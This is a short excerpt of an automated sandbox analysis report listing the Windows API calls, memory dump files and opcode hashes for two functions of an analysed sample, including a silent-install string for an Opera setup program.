                                                                                                                                              • Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,0043A728,?,00004000,00000000,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000,004067E1,80000002), ref: 004065B6
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004065C1
                                                                                                                                              Strings
                                                                                                                                              • "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0, xrefs: 00406577
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                              • API String ID: 3356406503-1546330588
                                                                                                                                              • Opcode ID: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                              • Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
                                                                                                                                              • Opcode Fuzzy Hash: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                              • Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                                                                                                              • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99